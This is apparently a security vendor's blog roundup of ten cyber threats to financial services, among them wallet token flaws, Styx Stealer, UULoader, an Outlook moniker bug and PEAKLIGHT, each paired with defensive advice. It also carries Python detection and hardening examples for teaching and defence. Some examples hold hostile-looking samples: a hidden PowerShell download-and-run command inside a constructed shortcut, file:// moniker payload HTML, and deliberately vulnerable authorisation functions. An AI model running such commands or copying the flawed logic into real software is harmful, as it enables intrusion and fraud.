Product
Jake Trujillo
Aug 26, 2024
Note: These were the top 10 cyber threats to the Financial Services industry as of October 9th, 2024.
1. Digital Wallet Security Flaws
A series of vulnerabilities draining people's digital wallets.
Summary: Researchers showed that weaknesses in how digital wallets such as Apple Pay, Google Pay, and PayPal bind payment cards allow transactions with stolen and even canceled credit cards. When a card is added to a wallet, the attacker can downgrade the verification the issuing bank performs by choosing knowledge-based authentication (KBA) instead of multi-factor authentication (MFA), then answer with easily obtainable data such as a billing address or the last four digits of a Social Security number. Once the card is bound, the payment token the bank issued to the wallet stays active even after the victim cancels the card, because the bank links the existing token to the replacement card instead of revoking it. Recurring payments compound the problem: a one-time purchase labeled as recurring is still authorized when the card is locked, since the lock is applied only to one-time transactions.
Free Advice: Alert customers immediately when a card is added to a wallet or wallet details change. On the issuing side, require MFA rather than KBA for card binding, revoke wallet tokens (instead of re-linking them) when a card is reported lost, stolen, or canceled, and apply card locks to recurring transactions as well as one-time ones.
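To make the three issuer-side failures concrete, here is an added example (not code from the researchers, Apple, Google, PayPal, or any bank) that models each decision as a vulnerable function beside a hardened one. The card, token and verification-method names are hypothetical.

```python
"""Issuer-side logic for the three wallet weaknesses above, vulnerable beside hardened.
Added example; all names (cards, tokens, method labels) are hypothetical."""
from dataclasses import dataclass, field


@dataclass
class Card:
    pan_suffix: str
    status: str = "active"                       # active | locked | canceled
    tokens: set = field(default_factory=set)     # wallet tokens bound to this card
    replacement: "Card | None" = None


@dataclass
class Transaction:
    token: str
    amount: int
    recurring: bool = False


# --- weakness 1: letting the wallet pick the weakest verification method ---
def pick_verification_vulnerable(offered: list, requested: str) -> str:
    # Issuer honours whatever the wallet asks for, so an attacker simply asks for "kba".
    return requested if requested in offered else offered[0]


def pick_verification_hardened(offered: list, requested: str) -> str:
    # KBA answers (address, last four of SSN) live in breach dumps; never accept them for binding.
    strong = [m for m in offered if m != "kba"]
    if not strong:
        raise PermissionError("no strong verification method available; refuse binding")
    return requested if requested in strong else strong[0]


# --- weakness 2: carrying the wallet token over to the replacement card ---
def cancel_card_vulnerable(card: Card, replacement: Card) -> None:
    card.status = "canceled"
    replacement.tokens |= card.tokens            # the old wallet token keeps working
    card.replacement = replacement


def cancel_card_hardened(card: Card, replacement: Card) -> None:
    card.status = "canceled"
    card.tokens.clear()                          # wallet must re-provision with fresh verification
    card.replacement = replacement


# --- weakness 3: honouring the recurring flag on a locked card ---
def authorize_vulnerable(card: Card, txn: Transaction) -> bool:
    if txn.token not in card.tokens:
        return False
    if card.status == "locked" and not txn.recurring:
        return False                             # the lock only covers one-time purchases
    return card.status != "canceled"


def authorize_hardened(card: Card, txn: Transaction) -> bool:
    if txn.token not in card.tokens:
        return False
    return card.status == "active"               # lock and cancel block everything, recurring or not
```

The hardened versions are deliberately stricter than convenient: refusing KBA may block some legitimate enrollments, and clearing tokens on cancellation forces the customer to re-add the replacement card, which is exactly the re-verification step the attack relies on skipping.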
2. Phemedrone
A stealer whose developer gave himself away.
Summary: A new information stealer, Styx Stealer, which is derived from the earlier Phemedrone Stealer, came to light through an operational security mistake by its developer. While debugging the stealer on his own machine, the developer leaked data from it, exposing his Telegram accounts, contacts, emails, and cryptocurrency transactions.
Styx Stealer harvests browser data, cryptocurrency wallets, and system information. It uses evasion techniques and refuses to run in certain countries, including Russia and Ukraine.
Free Advice: Styx Stealer hands stolen data to its operator through Telegram. Where Telegram and Discord are not needed for business, block or restrict them on work devices, and alert on outbound traffic from endpoints to the Telegram Bot API and to Discord webhooks, which stealers commonly use for exfiltration.
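An added example of the detection logic the advice above calls for, not from Check Point or the page: it scans a constructed, Squid-style proxy log for POSTs to Telegram's Bot API or to Discord webhooks coming from processes that are not the official clients. The log format, hostnames, process names and tokens are all made up for the example.

```python
"""Flag outbound requests that look like stealer exfiltration over Telegram's Bot API
or Discord webhooks. Added example; the log format and every line in SAMPLE_LOG are constructed."""
import re
from dataclasses import dataclass

# Telegram bot tokens look like <digits>:<url-safe chars>; stealers call sendDocument/sendMessage.
TELEGRAM_BOT = re.compile(r"^https?://api\.telegram\.org/bot(\d{6,12}):([A-Za-z0-9_-]{30,})/(\w+)")
DISCORD_WEBHOOK = re.compile(r"^https?://(?:\w+\.)?discord(?:app)?\.com/api/webhooks/(\d+)/")

# Constructed log: "<client> <method> <url> <status> <bytes_out> <process>"
SAMPLE_LOG = """\
10.0.4.21 GET https://www.example.com/ 200 512 chrome.exe
10.0.4.21 POST https://api.telegram.org/bot7123456789:AAHx9QwerTYuiop123asdfGHJKLzxcvbnm_Q/sendDocument 200 884213 AcroRd32.exe
10.0.4.37 POST https://discord.com/api/webhooks/1201234567890123456/abcDEF 204 20481 svchost.exe
10.0.4.37 GET https://discord.com/channels/@me 200 903 Discord.exe
10.0.4.50 POST https://api.telegram.org/bot7000000001:XYZ_11112222333344445555666677778888/sendMessage 200 310 Telegram.exe
"""


@dataclass
class Alert:
    client: str
    process: str
    channel: str
    bytes_out: int
    token_id: str


def scan_proxy_log(text: str, allowed_processes=("Telegram.exe", "Discord.exe")) -> list:
    """Return one Alert per upload to a bot/webhook endpoint from a non-client process."""
    alerts = []
    for line in text.splitlines():
        client, method, url, status, bytes_out, process = line.split()
        if method != "POST":
            continue                  # exfiltration is an upload; ordinary browsing is GET-heavy
        m = TELEGRAM_BOT.match(url)
        if m:
            channel, token_id = f"telegram:{m.group(3)}", m.group(1)
        else:
            m = DISCORD_WEBHOOK.match(url)
            if not m:
                continue
            channel, token_id = "discord:webhook", m.group(1)
        if process in allowed_processes:
            continue                  # the official client legitimately POSTs to these hosts
        alerts.append(Alert(client, process, channel, int(bytes_out), token_id))
    return alerts
```

The bot ID captured in `token_id` is worth keeping in the alert: a token embedded in a stealer is the same token the operator uses, and it is what tied Styx Stealer back to its author.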
3. Lazarus
A notorious North Korean threat group.
Summary: The North Korean Lazarus Group, specifically its BlueNoroff subgroup, is behind a macOS malware named "TodoSwift" that ships as an apparently legitimate application called "TodoTasks." The lure plays on interest in cryptocurrency: when launched, the app shows the user a decoy PDF about Bitcoin prices while, in the background, it downloads and runs a malicious binary that compromises the system.
Free Advice: On macOS, keep Gatekeeper enforced and allow only notarized applications to run; treat unsolicited "documents" that arrive as applications or disk images, especially cryptocurrency-themed ones, as hostile; and alert on applications that download and execute a new binary shortly after first launch.
4. UULoader
A malware payload that unfurls in multiple steps.
Summary: UULoader is a new loader that delivers Gh0st RAT and Mimikatz while posing as a legitimate application installer, and it has been aimed at Chinese and Korean speakers. Its embedded archive holds two core executables whose file headers have been stripped, so that static scanners do not recognize them as executables; the loader restores the headers before use. One of the two is a legitimate program that the loader uses to side-load a malicious DLL, which then delivers the final-stage payloads. To keep the victim from noticing, UULoader also runs a decoy that looks like a routine update, such as a Chrome update.
Free Advice: Enforce application allowlisting on Windows endpoints (AppLocker or Windows Defender Application Control) so that only installers and binaries vetted by IT can run, and alert on signed executables loading DLLs from user-writable directories, which is the classic side-loading pattern.
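An added example, not UULoader's or the researchers' code, of how to spot the header-stripping trick in a file triage pipeline: it assumes the stripped bytes are the two-byte "MZ" magic (the page says only that the headers are missing), detects files that lack the magic but still carry PE structure, and restores the magic so normal tooling can parse the sample. The "executable" below is a constructed minimal PE stub built in the block, not real malware.

```python
"""Detect executables whose 'MZ' magic has been stripped and restore the header for analysis.
Added example; assumes the stripped bytes are the 2-byte magic, and the sample PE is constructed."""
import struct

DOS_STUB_MSG = b"This program cannot be run in DOS mode"


def build_sample_pe() -> bytes:
    """Constructed minimal PE: DOS header with e_lfanew pointing at a PE signature at 0x80."""
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    dos[0x3c:0x40] = struct.pack("<I", 0x80)                  # e_lfanew -> offset of 'PE\0\0'
    stub = b"\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21" + DOS_STUB_MSG + b".\r\n$"
    body = bytes(dos) + stub
    body += b"\x00" * (0x80 - len(body))
    # COFF header: machine=AMD64, 2 sections, timestamp 0, no symbols, optional header 0xF0, DLL flags
    body += b"PE\0\0" + struct.pack("<HHIIIHH", 0x8664, 2, 0, 0, 0, 0xF0, 0x2022)
    return body + b"\x00" * 64


def strip_mz(data: bytes) -> bytes:
    """What the loader ships on disk: the same bytes with the magic blanked out."""
    return b"\x00\x00" + data[2:]


def looks_like_headerless_pe(data: bytes) -> bool:
    """True when the file is not a PE by magic but still carries PE structure:
    a sane e_lfanew that lands on 'PE\\0\\0', or the DOS stub message near the start."""
    if len(data) < 0x40 or data[:2] == b"MZ":
        return False                                          # ordinary PE (or too short)
    e_lfanew = struct.unpack_from("<I", data, 0x3c)[0]
    has_pe_sig = 0x40 <= e_lfanew <= len(data) - 4 and data[e_lfanew:e_lfanew + 4] == b"PE\0\0"
    return has_pe_sig or DOS_STUB_MSG in data[:0x200]


def restore_mz(data: bytes) -> bytes:
    """Put the magic back so pefile, disassemblers and AV engines will parse the sample."""
    if not looks_like_headerless_pe(data):
        raise ValueError("not a headerless PE")
    return b"MZ" + data[2:]
```

Run `looks_like_headerless_pe` over every file extracted from an installer's archive, regardless of extension: the point of the trick is that a scanner keyed on the magic bytes or on `.exe`/`.dll` names never looks inside.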
5. CVE-2024-38021
A flaw that can do serious damage without any clicks.
Summary: CVE-2024-38021 is a zero-click remote code execution flaw in Microsoft Outlook. It stems from how Outlook handles hyperlink objects inside image tags in HTML mail: the link string is handed to the MkParseDisplayName function, which parses composite monikers unsafely. Microsoft's fix for the earlier, closely related CVE-2024-21413 added a security flag to that moniker parsing, but the image-tag code path never set it, so the same primitive stayed reachable and allowed NTLM credential leakage and code execution. Two caveats for prioritisation: Microsoft rated the bug Important rather than Critical, and the no-interaction case applies to mail from trusted senders; for untrusted senders the victim still has to click the link.
Free Advice: Apply Microsoft's July 2024 Office security updates to every Outlook installation. The fix ships through Office updates, not the Windows cumulative update, so verify Outlook's build rather than the Windows patch level. At the mail gateway, strip or quarantine file:// hyperlinks in inbound HTML mail; there is no legitimate reason for external mail to carry them.
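An added example, not from Morphisec or Microsoft, of a gateway-side check for the link shape these bugs depend on: file:// URLs in anchors or image sources, and in particular the composite-moniker form from the public CVE-2024-21413 research, in which "!" separates a remote file path from an item inside it. The two sample mail bodies are constructed, and the block is a detection heuristic, not a description of the exploit.

```python
"""Flag file:// links in inbound HTML mail, including the composite-moniker '!' form.
Added example; the sample mail bodies are constructed."""
import re
from html.parser import HTMLParser
from typing import Optional

# Outlook resolves both anchor hrefs and image sources as monikers, so check both.
URL_ATTRS = {"a": ("href",), "img": ("src", "href"), "v:imagedata": ("src",)}
FILE_URL = re.compile(r"^\s*file:", re.IGNORECASE)


class LinkCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.links = []                      # (tag, attribute, value)

    def handle_starttag(self, tag, attrs):
        for attr, value in attrs:
            if value and attr in URL_ATTRS.get(tag, ()):
                self.links.append((tag, attr, value))


def classify_link(value: str) -> Optional[str]:
    """'composite' for file:...path!item (the MonikerLink shape), 'file' for any other file: URL."""
    if not FILE_URL.match(value):
        return None
    path = value.split(":", 1)[1]
    return "composite" if "!" in path else "file"


def scan_mail_html(html: str) -> list:
    """Return a finding per file:// link, with the tag and attribute it was found in."""
    parser = LinkCollector()
    parser.feed(html)
    findings = []
    for tag, attr, value in parser.links:
        kind = classify_link(value)
        if kind:
            findings.append({"tag": tag, "attr": attr, "kind": kind, "url": value})
    return findings


# Constructed samples: one ordinary message, one carrying composite file:// monikers in both tags.
SAMPLE_BENIGN = ('<p>Invoice attached. <a href="https://portal.example.com/inv/42">Portal</a>'
                 ' <img src="cid:logo"></p>')
SAMPLE_SUSPECT = ('<p>Click <a href="file:///\\\\10.20.30.40\\share\\doc.rtf!attacker">here</a></p>'
                  '<img src="file:///\\\\10.20.30.40\\share\\pic.png!x" width="1">')
```

A plain `file:` URL is already a reason to quarantine external mail; the `composite` verdict is the one to alert on loudly, since that is the shape that reaches the unsafe moniker parsing.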
6. ValleyRAT
A RAT that is hard to track down.
Summary: An ongoing campaign is deploying ValleyRAT against Chinese-speaking users, including people working in finance. The malware runs as shellcode executed directly in memory, which leaves little on disk for scanners to find. The initial lure is an executable dressed up as legitimate software, using familiar icons and filenames that look like financial documents, to get the target to run it. Once active, ValleyRAT makes sure it is the only instance running, cleans up traces of earlier infections, and stores its C2 server details in the Windows registry. It checks for virtual-machine environments to frustrate analysis and uses sleep obfuscation and XOR encoding to complicate detection.
Free Advice: Block execution of unsigned binaries from user-writable locations such as Downloads and Temp, and make sure your endpoint protection scans memory, since a shellcode-based RAT like ValleyRAT leaves little on disk. Baseline which processes write configuration into the registry so that a new, unexpected binary value stands out, and when you find one, decode it: an XOR-encoded C2 address recovers easily.
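An added example, not ValleyRAT's or the researchers' code, of the last step in that advice: pulling a binary value out of a .reg export and brute-forcing a single-byte XOR key until an ip:port string appears. The page only says that ValleyRAT keeps C2 details in the registry and uses XOR encoding; the registry key, value name, key byte and blob below are all constructed for the example.

```python
"""Recover a single-byte-XOR-encoded C2 string from a registry binary value.
Added example; the .reg text, key path, value name and XOR key are constructed."""
import re

C2_PATTERN = re.compile(rb"\b(?:\d{1,3}\.){3}\d{1,3}:\d{2,5}\b")


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def recover_xor_c2(blob: bytes):
    """Try all 256 keys; return (key, 'ip:port') for the first key that yields one, else None."""
    for key in range(256):
        candidate = xor_bytes(blob, key)
        m = C2_PATTERN.search(candidate)
        if m:
            return key, m.group(0).decode()
    return None


def parse_reg_hex(reg_text: str, value_name: str) -> bytes:
    """Extract a REG_BINARY value ("name"=hex:aa,bb,...) from .reg export text,
    including the backslash-continued lines regedit emits for long values."""
    pattern = re.compile(r'"%s"=hex:([0-9a-fA-F,\\\s]+)' % re.escape(value_name))
    m = pattern.search(reg_text)
    if not m:
        raise KeyError(value_name)
    digits = re.sub(r"[^0-9a-fA-F]", "", m.group(1))
    return bytes.fromhex(digits)


# Constructed .reg export. "Config" is the string "203.0.113.5:8080" XORed with 0x5A.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\ExampleUpdater]
"Version"="1.0"
"Config"=hex:68,6a,69,74,6a,74,6b,6b,\
  69,74,6f,60,62,6a,62,6a
"Flag"=dword:00000001
'''
```

The ip:port regex is the oracle here; for a sample that stores a hostname instead, swap in a check for a high ratio of printable bytes and a dotted label, and for multi-byte keys move to a rolling-key search. The brute force is cheap either way, and it is faster than waiting for the RAT to decode the value itself under a debugger.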
7. SpyBanker
A financial phishing campaign.
Summary: A new phishing technique targeting both Android and iPhone users was observed in a campaign against clients of a major Czech bank. Victims end up with phishing applications that mimic the bank's real app without ever being asked to allow installation from unknown sources. On Android, the phishing site installs a WebAPK, a browser-generated package that appears to come from Google Play, so the usual third-party install warning never fires. On iOS, victims are walked through adding a Progressive Web Application (PWA) to the home screen; the PWA is a website that behaves like a standalone app and uses the system's own prompts, which makes it look legitimate.
Free Advice: Blocking third-party app stores does not stop this technique, because WebAPKs and PWAs are installed through the browser. Instead, block the phishing domains as they are reported, tell customers and staff that the bank's app is obtained only from the official store and never through a link in an SMS, ad, or pop-up, and report the lure sites so the hosting is taken down.
8. Peaklight
Pirate a movie, and you might just download a hidden sequel: Malware.
Summary: PEAKLIGHT is a new memory-only dropper distributed through pirated movie downloads. The "movie" is a ZIP archive containing a Windows shortcut (LNK) file; opening it runs a PowerShell command that downloads the next stage, which in turn fetches the final payloads. Because each stage runs in memory and leaves no footprint on disk, and because the dropper is heavily obfuscated, the chain is hard to spot. It comes in several variants, each targeting different directories and using its own execution logic.
Free Advice: Block known PEAKLIGHT domains and IP addresses at the firewall or web proxy to cut the download and command and control (C2) traffic, and break the chain earlier: block LNK files inside archives at the mail and web gateways, and enable PowerShell script-block logging so the downloader command is recorded even when nothing touches disk.
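An added example, not Mandiant's or the malware's code, of the triage a gateway or analyst can do on the LNK stage: parse the shortcut structure to recover the target and command-line arguments, and flag the hidden-window PowerShell download-and-run pattern the lure relies on. The .lnk bytes are constructed in the block from the public MS-SHLLINK layout, not taken from a real sample, and the PowerShell text and domain are hypothetical.

```python
"""Pull the target and arguments out of a Windows shortcut (.lnk) and flag download-and-run lures.
Added example; the shortcut bytes, PowerShell command and domain are constructed."""
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")   # {00021401-0000-0000-C000-000000000046}
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_FIELDS = [(HAS_NAME, "name"), (HAS_RELPATH, "relative_path"),
                 (HAS_WORKDIR, "working_dir"), (HAS_ARGS, "arguments"), (HAS_ICON, "icon")]

SUSPICIOUS = re.compile(r"(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s|DownloadString|"
                        r"DownloadFile|Invoke-WebRequest|\biwr\b|\biex\b|Invoke-Expression|"
                        r"\.Invoke\(|mshta|bitsadmin)", re.IGNORECASE)


def build_lnk(relative_path: str, arguments: str, icon: str) -> bytes:
    """Constructed minimal shortcut: 0x4C header plus Unicode StringData, no IDList or LinkInfo."""
    flags = HAS_RELPATH | HAS_ARGS | HAS_ICON | IS_UNICODE
    header = struct.pack("<I16sI", 0x4C, LNK_CLSID, flags) + b"\x00" * (0x4C - 24)

    def field(s):                        # CountCharacters (uint16) + UTF-16LE chars, no terminator
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + field(relative_path) + field(arguments) + field(icon)


def parse_lnk(data: bytes) -> dict:
    size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a shell link")
    pos = 0x4C
    if flags & HAS_IDLIST:               # skip LinkTargetIDList: uint16 size + that many bytes
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:             # skip LinkInfo: its uint32 size includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    out = {"flags": flags}
    unicode = bool(flags & IS_UNICODE)
    for bit, name in STRING_FIELDS:      # StringData fields appear in this fixed order
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        nbytes = count * 2 if unicode else count
        raw = data[pos:pos + nbytes]
        out[name] = raw.decode("utf-16-le") if unicode else raw.decode("cp1252")
        pos += nbytes
    return out


def triage_lnk(data: bytes) -> dict:
    """Parse, then mark the shortcut malicious if it runs PowerShell with download/hide tricks."""
    info = parse_lnk(data)
    cmd = f"{info.get('relative_path', '')} {info.get('arguments', '')}"
    hits = sorted({m.group(0).lower() for m in SUSPICIOUS.finditer(cmd)})
    info["suspicious"] = hits
    info["verdict"] = "malicious" if "powershell" in cmd.lower() and hits else "clean"
    return info


# Constructed samples: a lure wired to PowerShell, and an ordinary media-player shortcut.
SAMPLE_LURE = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-w hidden -ep bypass -c \"iex (New-Object Net.WebClient).DownloadString('https://cdn.example.invalid/p')\"",
    r"%SystemRoot%\system32\wmplayer.exe")
SAMPLE_BENIGN = build_lnk(r"..\..\Program Files\VLC\vlc.exe", "", r"%ProgramFiles%\VLC\vlc.exe")
```

Real lures usually set the LinkTargetIDList and LinkInfo sections too, which the parser skips by size, and they point the icon at a media player so the file looks like a video; the icon field is returned so that mismatch can be checked alongside the command line.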
9. Cheana
An imposter VPN.
Summary: A phishing campaign impersonates the VPN provider WarpVPN with a fake download site that delivers malware known as Cheana Stealer. The stealer exfiltrates what it collects to a command and control (C2) server over HTTPS. It harvests cryptocurrency-related browser extensions, standalone crypto wallets, stored browser passwords and login data, cookies, SSH keys, macOS passwords, and Keychain data. The campaign is tied to a Telegram channel with over 54,000 subscribers that has been active since 2018 and is believed to have changed operators in 2021.
Free Advice: Enable MFA on all critical and internet-facing systems, but do not rely on it alone against a stealer that takes session cookies and SSH keys, both of which sidestep MFA. When an infection is found, invalidate active sessions and rotate the SSH keys and stored credentials from that host, and only install VPN clients from the vendor's verified site.
10. ZeroSevenGroup
A data breach exposing sensitive data from Toyota.
Summary: Toyota confirmed a data breach after ZeroSevenGroup leaked 240GB of data stolen from its U.S. branch on a cybercrime forum. The dump included employee, customer, contract, and financial information and appears to have been taken from a backup server compromised on December 25, 2022, well over a year before the leak surfaced.
Free Advice: Treat backup servers as crown-jewel assets: isolate them from the general network, restrict and log access to them, encrypt backup data, and keep them in scope when assessing a breach, since an intrusion there can sit unnoticed for a long time.
Sign up for Fletch to get access to more industry threats.